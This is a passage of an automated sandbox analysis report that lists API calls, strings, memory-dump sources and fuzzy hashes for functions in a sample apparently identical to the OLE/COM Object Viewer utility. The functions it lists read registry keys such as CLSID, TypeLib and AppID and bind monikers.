                                                                          • SendMessageW.USER32(?,0000104B,00000000,00000001), ref: 00D2D23B
                                                                          • SendMessageW.USER32(?,0000104C,00000000,00000009), ref: 00D2D263
                                                                          • #5977.MFC42U ref: 00D2D26F
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00D2D27A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Cursor$Load$#4704#5977CloseEnumOpenlstrcpywsprintf
                                                                          • String ID: CLSID$CLSID\%s$Class Name
                                                                          • API String ID: 3330777091-3884686139
                                                                          • Opcode ID: fb49eb339f9ced750cc8005d000b6b26bbcf7ae52813db73cf903a743a1f0f95
                                                                          • Instruction ID: 0fb9234af64e4bc1e48dd0fcb9f2808b36dd1a1f4ea3656cdb94bf6ed0878db9
                                                                          • Opcode Fuzzy Hash: fb49eb339f9ced750cc8005d000b6b26bbcf7ae52813db73cf903a743a1f0f95
                                                                          • Instruction Fuzzy Hash: 706131B5900328AFEB209F60DC89FDA77BAFB45304F0045A5E619E2250D7765ED5CF60
                                                                          APIs
                                                                          • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,00000000,?,?,?,?,00D3CB28,00000000,00000000,?), ref: 00D3CB71
                                                                          • GetLastError.KERNEL32(?,?,?,00D3CB28,00000000,00000000,?,?,?,00D3CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D3CB77
                                                                          • malloc.MSVCRT ref: 00D3CB9D
                                                                          • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,?,00D3CB28,00000000,00000000,?,?,?,00D3CE14,00000000,00000000), ref: 00D3CBC1
                                                                          • GetLastError.KERNEL32(?,?,00D3CB28,00000000,00000000,?,?,?,00D3CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D3CBCB
                                                                          • free.MSVCRT ref: 00D3CD14
                                                                          • free.MSVCRT ref: 00D3CD20
                                                                          • free.MSVCRT ref: 00D3CD31
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: free$ErrorInformationLastToken$malloc
                                                                          • String ID:
                                                                          • API String ID: 3900411180-0
                                                                          • Opcode ID: 5123369bf25a7139441645983b8ae7820c928ababc03341aa43b9f7003e81a0e
                                                                          • Instruction ID: d4acbc1883b44e4259c5d03ff68f547d26fba8594ca85e5ece852668b028e580
                                                                          • Opcode Fuzzy Hash: 5123369bf25a7139441645983b8ae7820c928ababc03341aa43b9f7003e81a0e
                                                                          • Instruction Fuzzy Hash: 0F51A37A910226EBCB119FA4EC4876A7A74FF46351F269125FC01F7250DB348D409BB0
                                                                          APIs
                                                                          • #4493.MFC42U ref: 00D30E90
                                                                          • __EH_prolog3_GS.LIBCMT ref: 00D31B2B
                                                                          • #540.MFC42U(00000044,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D31B35
                                                                          • #540.MFC42U(00000044,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D31B41
                                                                          • #4155.MFC42U(00000004,00000044,00000000,?,?), ref: 00D31B4F
                                                                          • #4155.MFC42U(00000005,00000004,00000044,00000000,?,?), ref: 00D31B59
                                                                          • #540.MFC42U(00000005,00000004,00000044,00000000,?,?), ref: 00D31B61
                                                                          • #3865.MFC42U(?,00000005,00000004,00000044,00000000,?,?), ref: 00D31B77
                                                                          • #2970.MFC42U(00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00D31B8C
                                                                          • #2910.MFC42U(000000FF,00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00D31B99
                                                                          • #3792.MFC42U(000000FF,00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00D31BA6
                                                                          • #3792.MFC42U(00000000,000000FF,00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00D31BB8
                                                                          • wsprintfW.USER32 ref: 00D31BE8
                                                                          • #5568.MFC42U(000000FF), ref: 00D31BF6
                                                                          • #6399.MFC42U(?,?,?,000000FF), ref: 00D31C09
                                                                          • #800.MFC42U(?,?,?,000000FF), ref: 00D31C11
                                                                          • #800.MFC42U(?,?,?,000000FF), ref: 00D31C19
                                                                          • #800.MFC42U(?,?,?,000000FF), ref: 00D31C21
                                                                          Strings
                                                                          • ,, xrefs: 00D31B70
                                                                          • %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, xrefs: 00D31BE2
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #540#800$#3792#4155$#2910#2970#3865#4493#5568#6399H_prolog3_wsprintf
                                                                          • String ID: %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d$,
                                                                          • API String ID: 3591584436-2100854449
                                                                          • Opcode ID: 24ef7e6c7b7e7dd1df8258940a40084bf6c1b18bcfd61435b5d2b567ffbb60d6
                                                                          • Instruction ID: df15e9b585ac93a2280bf7e60eb2f931f8d3d8eaedf0b8410e46fc60a25e83d3
                                                                          • Opcode Fuzzy Hash: 24ef7e6c7b7e7dd1df8258940a40084bf6c1b18bcfd61435b5d2b567ffbb60d6
                                                                          • Instruction Fuzzy Hash: 5B310532900118AACF05EBA0DC52EEDBB76EF58300F444028F612B71E2DB756A1ADF71
                                                                          APIs
                                                                          • #540.MFC42U(?,?), ref: 00D36CF1
                                                                          • #2810.MFC42U(?,IMoniker::BindToObject failed on the file moniker created from ( "%s" ).,00000000,?,?), ref: 00D36D15
                                                                          • #800.MFC42U(?,00000000), ref: 00D36D39
                                                                            • Part of subcall function 00D35010: #540.MFC42U(23685920,?,?,?,?,00D40AE8,000000FF,?,00D32E44,?,?,00000104), ref: 00D35050
                                                                            • Part of subcall function 00D35010: CoGetClassObject.OLE32(000000FC,23685920,00000000,00D29E3C,00000000,23685920,?,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D3507D
                                                                            • Part of subcall function 00D35010: #860.MFC42U(CoGetClassObject failed.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D350B4
                                                                            • Part of subcall function 00D35010: #1262.MFC42U(00000000,CoGetClassObject failed.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D350BC
                                                                            • Part of subcall function 00D35010: #860.MFC42U(CoGetClassObject succeeded, but punk was NULL.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D350CF
                                                                            • Part of subcall function 00D35010: #1262.MFC42U(00000000,CoGetClassObject succeeded, but punk was NULL.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D350D7
                                                                            • Part of subcall function 00D35010: #860.MFC42U(QueryInterface on class factory for IClassFactory failed.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D35118
                                                                            • Part of subcall function 00D35010: #1262.MFC42U(00000000,QueryInterface on class factory for IClassFactory failed.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D35120
                                                                            • Part of subcall function 00D35010: #860.MFC42U(CoGetClassObject succeeded, but pClassFactory was NULL.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D35136
                                                                            • Part of subcall function 00D35010: #1262.MFC42U(00000000,CoGetClassObject succeeded, but pClassFactory was NULL.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D3513E
                                                                          • RegOpenKeyW.ADVAPI32(80000000,Interface,?), ref: 00D36E1F
                                                                          • malloc.MSVCRT ref: 00D36E77
                                                                          • malloc.MSVCRT ref: 00D36EBA
                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000050), ref: 00D36F38
                                                                          • CLSIDFromString.OLE32(00000000,00000000), ref: 00D36F76
                                                                          • StringFromGUID2.OLE32(00000000,?,00000100), ref: 00D37148
                                                                          • lstrcpyW.KERNEL32(?,00000000), ref: 00D3717B
                                                                          • RegQueryValueW.ADVAPI32(?,?,?,00000200), ref: 00D371A6
                                                                          • wsprintfW.USER32 ref: 00D371D9
                                                                          • free.MSVCRT ref: 00D3733B
                                                                          • free.MSVCRT ref: 00D3734A
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00D37389
                                                                          Strings
                                                                          • IMoniker::BindToObject failed on the file moniker created from ( "%s" )., xrefs: 00D36D09
                                                                          • ', xrefs: 00D36DCF
                                                                          • Interface, xrefs: 00D36E15
                                                                          • %s <no name>, xrefs: 00D371CD
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #1262#860$#540FromStringfreemalloc$#2810#800ClassCloseEnumObjectOpenQueryValuelstrcpywsprintf
                                                                          • String ID: %s <no name>$'$IMoniker::BindToObject failed on the file moniker created from ( "%s" ).$Interface
                                                                          • API String ID: 3715769521-149418688
                                                                          • Opcode ID: 33795c3e8f6832767a27be9c99bada5138a476b9a16acac7c90c8ac08b203e95
                                                                          • Instruction ID: 6d5f0dd5139c28a2082683c4d30788ce830e73c5f024d44f4ec6bfc903a8022c
                                                                          • Opcode Fuzzy Hash: 33795c3e8f6832767a27be9c99bada5138a476b9a16acac7c90c8ac08b203e95
                                                                          • Instruction Fuzzy Hash: D122F4B4905628DFDB64CF14CD84BA9B7B9FB44315F1040E9E60AA7292D7749EC4CF28
                                                                          APIs
                                                                          • #1662.MFC42U(23685920), ref: 00D34326
                                                                          • #858.MFC42U(?), ref: 00D34531
                                                                          • #540.MFC42U ref: 00D3455F
                                                                          • StringFromGUID2.OLE32(?,?,00000028,?,00D29EDC), ref: 00D3459A
                                                                          • lstrcpyW.KERNEL32(?,00000000), ref: 00D345B1
                                                                          • #2810.MFC42U(?,CLSID\%s,?,?), ref: 00D345E0
                                                                          • lstrcpyW.KERNEL32(?,?), ref: 00D345F3
                                                                          • RegQueryValueW.ADVAPI32(80000000,00000000,?,00000100), ref: 00D34618
                                                                          • #2810.MFC42U(?,%s (%s),?,?), ref: 00D34636
                                                                          • #2810.MFC42U(?,00D2572C,?,?,00D29EDC), ref: 00D34651
                                                                          • #540.MFC42U(00000000,?), ref: 00D346F4
                                                                          • #2810.MFC42U(?,Could not add item to tree view. Internal OLEViewer error.,00000000,?), ref: 00D34709
                                                                          • #800.MFC42U(?,80004005,00000000,?), ref: 00D3472C
                                                                          • #2644.MFC42U(00000000,?), ref: 00D34737
                                                                          • #800.MFC42U(00000000,?), ref: 00D3476E
                                                                          Strings
                                                                          • %s (%s), xrefs: 00D3462A
                                                                          • CLSID\%s, xrefs: 00D345D4
                                                                          • Could not add item to tree view. Internal OLEViewer error., xrefs: 00D346FD
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #2810$#540#800lstrcpy$#1662#2644#858FromQueryStringValue
                                                                          • String ID: %s (%s)$CLSID\%s$Could not add item to tree view. Internal OLEViewer error.
                                                                          • API String ID: 2368693756-676685266
                                                                          • Opcode ID: 34f1b2df019cf293356fb3426f0083bc1320c2c0d35436042e4765b80a54b777
                                                                          • Instruction ID: aca0976eb7ef4c2dab7892d27017338e07f198fc73180005f643ef0e33933afe
                                                                          • Opcode Fuzzy Hash: 34f1b2df019cf293356fb3426f0083bc1320c2c0d35436042e4765b80a54b777
                                                                          • Instruction Fuzzy Hash: C6D1E4759012299FDB60EF54DC99B9DB7B9FF18314F1040EAE409A72A1DB70AE84CF60
                                                                          APIs
                                                                          • __EH_prolog3_GS.LIBCMT ref: 00D2CB20
                                                                          • #540.MFC42U(00000264,00D2DF79), ref: 00D2CB33
                                                                          • StringFromGUID2.OLE32(?,?,00000028,00000264,00D2DF79), ref: 00D2CB5F
                                                                          • #861.MFC42U(?), ref: 00D2CBEC
                                                                          • lstrcmpW.KERNEL32(?,Interactive User,?,?,?,?), ref: 00D2CC3D
                                                                          • #6195.MFC42U(00D221A0,?,?,?,?), ref: 00D2CC4E
                                                                          • #2634.MFC42U(00000000,00D221A0,?,?,?,?), ref: 00D2CC58
                                                                          • #6195.MFC42U(?,?,?,?,?), ref: 00D2CC69
                                                                          • #2634.MFC42U(00000001,?,?,?,?,?), ref: 00D2CC72
                                                                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D2CCA3
                                                                          • #6330.MFC42U(00000000,?,?,?,?), ref: 00D2CCAC
                                                                          • #800.MFC42U(00000000,?,?,?,?), ref: 00D2CCB7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #2634#6195$#540#6330#800#861FromH_prolog3_MessageSendStringlstrcmp
                                                                          • String ID: ActivateAtStorage$Interactive User$RemoteServerName$RunAs
                                                                          • API String ID: 3025489585-4117267133
                                                                          • Opcode ID: 86ce976b8d3388a8a91f437fb59021873691659db0a02c78a5eb6a56a8efe5c9
                                                                          • Instruction ID: 6483381d302414d64088d0f7fa3b30928433a89f3acff67cfbb6aed4705634ac
                                                                          • Opcode Fuzzy Hash: 86ce976b8d3388a8a91f437fb59021873691659db0a02c78a5eb6a56a8efe5c9
                                                                          • Instruction Fuzzy Hash: 6C41C871504329ABDB11EF24DD86FEF7779EF55704F0000A9B909AB2C1DAB15E48CA70
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00D3D924
                                                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000409,?,00000000,00000000,00000010,00D3B9B7,?,00000000,00000000,00000000), ref: 00D3D942
                                                                          • #2810.MFC42U(?,%s %s,?,00000000,?), ref: 00D3D96C
                                                                          • #922.MFC42U(?,?,?,?,?,?,?), ref: 00D3D97F
                                                                          • #858.MFC42U(00000000,?,?,?,?,?,?,?), ref: 00D3D98C
                                                                          • #800.MFC42U(00000000,?,?,?,?,?,?,?), ref: 00D3D997
                                                                          • LocalFree.KERNEL32(?,00000000,?,?,?,?,?,?,?), ref: 00D3D99F
                                                                          • #1197.MFC42U(?,00000000,00000000,?,?,?,?), ref: 00D3D9AA
                                                                          • #540.MFC42U ref: 00D3D94F
                                                                            • Part of subcall function 00D3DCEB: wsprintfW.USER32 ref: 00D3DD1D
                                                                          • #540.MFC42U ref: 00D3D9B7
                                                                          • #2810.MFC42U(?,<No system message defined> %s,00000000,?), ref: 00D3D9D5
                                                                          • #922.MFC42U(?,?,?,?,?,?), ref: 00D3D9E8
                                                                          • #858.MFC42U(00000000,?,?,?,?,?,?), ref: 00D3D9F5
                                                                          • #800.MFC42U(00000000,?,?,?,?,?,?), ref: 00D3DA01
                                                                          • #1197.MFC42U(?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00D3DA0B
                                                                          • #800.MFC42U(?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00D3DA13
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #800$#1197#2810#540#858#922$FormatFreeH_prolog3LocalMessagewsprintf
                                                                          • String ID: %s %s$<No system message defined> %s
                                                                          • API String ID: 3659733580-1395831093
                                                                          • Opcode ID: 07c71271fdea0c2ab2fabd48f2fafd65748cb414abbb9027d32cc4f44ac9247c
                                                                          • Instruction ID: 50327585abc5f4b3d564b4081b052a92a6e8ba512745769e75f17bb5f298de8e
                                                                          • Opcode Fuzzy Hash: 07c71271fdea0c2ab2fabd48f2fafd65748cb414abbb9027d32cc4f44ac9247c
                                                                          • Instruction Fuzzy Hash: A131D3B180020EAEDF01EBE0DD96DFFBB7EEF24345F144425B541B6192DA709A48DA71
                                                                          APIs
                                                                          • RegOpenKeyW.ADVAPI32(80000000,TypeLib,00000000), ref: 00D37402
                                                                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,00000040), ref: 00D3743B
                                                                          • RegOpenKeyW.ADVAPI32(00000000,?,?), ref: 00D3745D
                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000040), ref: 00D37496
                                                                          • RegQueryValueW.ADVAPI32(?,?,?,00000208), ref: 00D374C9
                                                                          • CLSIDFromString.OLE32(00000000,-00000008), ref: 00D37570
                                                                          • wcstol.MSVCRT ref: 00D37610
                                                                          • wcsrchr.MSVCRT ref: 00D3762C
                                                                          • wcstol.MSVCRT ref: 00D37650
                                                                          • wsprintfW.USER32 ref: 00D37696
                                                                          • wsprintfW.USER32 ref: 00D376B9
                                                                            • Part of subcall function 00D37F0B: SendMessageW.USER32(?,00001132,00000000,00D34852), ref: 00D37F1D
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00D37743
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00D37754
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: CloseEnumOpenwcstolwsprintf$FromMessageQuerySendStringValuewcsrchr
                                                                          • String ID: %s (Ver %s)$%s <no name>$'$TypeLib
                                                                          • API String ID: 3817488620-1332438793
                                                                          • Opcode ID: 8311c716e0cb6bebad6c0861aec37cf14117ae38d79c5efbd255a405878395a7
                                                                          • Instruction ID: 3da615d196674f6c6fc14de00ed2c1c7db63b0f657a40d2710fd2009c80e6d75
                                                                          • Opcode Fuzzy Hash: 8311c716e0cb6bebad6c0861aec37cf14117ae38d79c5efbd255a405878395a7
                                                                          • Instruction Fuzzy Hash: 61A1E3B5D086289FDB61DF64DC45BA9B7B8FB08305F0040EAE50DE6250DB78AE84DF61
                                                                          APIs
                                                                          • StringFromGUID2.OLE32(?,?,00000028,?,?,?,?,?,?,?), ref: 00D3D152
                                                                          • lstrcpyW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00D3D163
                                                                          • wsprintfW.USER32 ref: 00D3D179
                                                                          • RegOpenKeyW.ADVAPI32(80000000,CLSID,?), ref: 00D3D1AA
                                                                          • wsprintfW.USER32 ref: 00D3D1CD
                                                                            • Part of subcall function 00D3D6F5: RegOpenKeyExW.KERNELBASE(?,?,00000000,00020019,?,?,?,?,00D3D6E4,80000000,?,?,?,?,?), ref: 00D3D70D
                                                                            • Part of subcall function 00D3D6F5: RegQueryValueExW.ADVAPI32(?,?,00000000,?,80000000,00D3D6E4,?,?,?,00D3D6E4,80000000,?,?,?,?,?), ref: 00D3D72C
                                                                            • Part of subcall function 00D3D6F5: RegCloseKey.ADVAPI32(?,?,?,?,00D3D6E4,80000000,?,?,?,?,?,?,?,?), ref: 00D3D738
                                                                          • _wcsicmp.MSVCRT ref: 00D3D20E
                                                                          • wsprintfW.USER32 ref: 00D3D22D
                                                                            • Part of subcall function 00D3D81B: lstrlenW.KERNEL32(00D3D19D,?,80000000,00000000), ref: 00D3D846
                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,000000FF), ref: 00D3D25C
                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D3D270
                                                                          • wsprintfW.USER32 ref: 00D3D286
                                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00D3D2C0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: wsprintf$CloseOpenlstrcpy$EnumFromQueryStringValue_wcsicmplstrlen
                                                                          • String ID: AppID$AppID\%s$CLSID$CLSID\%s$CLSID\%s\LocalServer32$LocalServer32
                                                                          • API String ID: 566217164-1287389397
                                                                          • Opcode ID: 0c6167ed35e828ad50b48621cbd8ba91b565761a16832bf78904a9bbba1eae97
                                                                          • Instruction ID: f69175a85de0678a325e98bf0bc8cde5fea6778af75073f309a605d5016dcefa
                                                                          • Opcode Fuzzy Hash: 0c6167ed35e828ad50b48621cbd8ba91b565761a16832bf78904a9bbba1eae97
                                                                          • Instruction Fuzzy Hash: BB512B76900219AFDF21EF94ED45EEA77BDEF46304F0040A2B945E6141DBB09B898FB1
                                                                          APIs
                                                                          • #355.MFC42U(00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,23685920), ref: 00D325C2
                                                                          • #2507.MFC42U(00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,23685920), ref: 00D325D1
                                                                          • #800.MFC42U(00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,23685920), ref: 00D325E5
                                                                          • #3494.MFC42U(?,00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,23685920), ref: 00D3260E
                                                                          • #800.MFC42U(?,00000000,?,00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,23685920), ref: 00D32679
                                                                          • #3494.MFC42U(?,?,00000000,?,00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,23685920), ref: 00D32696
                                                                          • #800.MFC42U(00000000,?,?,?,00000000,?,00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,23685920), ref: 00D326D2
                                                                          • #800.MFC42U(?,00000000,AllFiles(*.*)|*.*|,?,23685920), ref: 00D32796
                                                                          Strings
                                                                          • IMoniker::BindToObject failed on the file moniker created from ( "%s" )., xrefs: 00D32748
                                                                          • *.*, xrefs: 00D325B5
                                                                          • Yh#, xrefs: 00D3272C
                                                                          • AllFiles(*.*)|*.*|, xrefs: 00D325A9
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #800$#3494$#2507#355
                                                                          • String ID: Yh#$*.*$AllFiles(*.*)|*.*|$IMoniker::BindToObject failed on the file moniker created from ( "%s" ).
                                                                          • API String ID: 539546934-1694893837
                                                                          • Opcode ID: 723d34e1f8aecb3e7ef3ac62cc2f73cf4134d0013609a226b2852410d5708614
                                                                          • Instruction ID: 87cd38cf5fbfa83f81db47daba43e2ff404f5e40ef509d67f0c6a842965a1ad2
                                                                          • Opcode Fuzzy Hash: 723d34e1f8aecb3e7ef3ac62cc2f73cf4134d0013609a226b2852410d5708614
                                                                          • Instruction Fuzzy Hash: 1A510571C146689FCB26DB64CC45BECBBB8BB14705F1481E9B059A72A1DB715F88CF20
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #4078
                                                                          • String ID: "
                                                                          • API String ID: 2741252101-123907689
                                                                          • Opcode ID: ada722f368d63d5d854b6f29e64fef8049284ccedc7a406d969fbc2831a4df66
                                                                          • Instruction ID: bcbfaeec0b6e9e5eaf055d8cacc029bd7972b97f5a132175478738ff36667c81
                                                                          • Opcode Fuzzy Hash: ada722f368d63d5d854b6f29e64fef8049284ccedc7a406d969fbc2831a4df66
                                                                          • Instruction Fuzzy Hash: F5A11978901648EFDB14DFA8E949BADBBB1FF49315F244029E402E63A4D7B49980CF31
                                                                          APIs
                                                                          • __EH_prolog3_GS.LIBCMT ref: 00D2B73B
                                                                          • #538.MFC42U(?), ref: 00D2B775
                                                                            • Part of subcall function 00D34899: #1662.MFC42U ref: 00D348D9
                                                                            • Part of subcall function 00D34899: #540.MFC42U ref: 00D348F3
                                                                            • Part of subcall function 00D34899: lstrcpyW.KERNEL32(?,00000000), ref: 00D34912
                                                                            • Part of subcall function 00D34899: CreateBindCtx.OLE32(00000000,?), ref: 00D34936
                                                                            • Part of subcall function 00D34899: MkParseDisplayName.OLE32(?,00000000,00000000,00000000), ref: 00D34971
                                                                            • Part of subcall function 00D34899: #2644.MFC42U ref: 00D349D1
                                                                            • Part of subcall function 00D34899: #2810.MFC42U(?,MkParseDisplayName(... "%s" ...) failed.,?), ref: 00D349E9
                                                                            • Part of subcall function 00D34899: #800.MFC42U(?,00000000), ref: 00D34A19
                                                                          • #800.MFC42U(?,?,?), ref: 00D2B799
                                                                          • #538.MFC42U(?,?,?,?), ref: 00D2B7A9
                                                                          • #800.MFC42U(?,?,?), ref: 00D2B7D1
